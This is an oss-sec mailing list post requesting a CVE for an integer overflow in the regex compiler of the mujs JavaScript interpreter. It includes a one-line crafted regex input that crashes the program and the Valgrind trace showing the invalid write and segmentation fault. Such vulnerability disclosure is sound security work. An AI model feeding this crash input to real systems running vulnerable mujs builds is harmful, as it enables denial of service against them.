oss-sec mailing list archives

CVE request - integer overflow and crash parsing regex in mujs

From: Gustavo Grieco <gustavo.grieco () gmail com>
Date: Sun, 30 Oct 2016 14:29:17 -0300

Hi,

It seems there is an integer overflow somewhere affecting function
js_regcomp (line 843 in regexp.c) in mujs. To reproduce (tested in revision
5c337af4b3df80cf967e4f9f6a21522de84b392a):

$ echo '(/.{135303839468541,43}/);' | valgrind --quiet ./build/mujs
==29376== Argument 'size' of function malloc has a fishy (possibly
negative) value: -5152
==29376==    at 0x4C2AB8D: malloc (in
/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==29376==    by 0x415FCC: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in
/home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376==
==29376== Invalid write of size 2
==29376==    at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in
/home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376==  Address 0x2 is not stack'd, malloc'd or (recently) free'd
==29376==
==29376==
==29376== Process terminating with default action of signal 11 (SIGSEGV)
==29376==  Access not within mapped region at address 0x2
==29376==    at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x41D127: js_newregexp (in
/home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376==    by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)

This test case was found using QuickFuzz. Please assign CVE is suitable.

Current thread:

CVE request - integer overflow and crash parsing regex in mujs Gustavo Grieco (Oct 30)
- Re: CVE request - integer overflow and crash parsing regex in mujs cve-assign (Oct 30)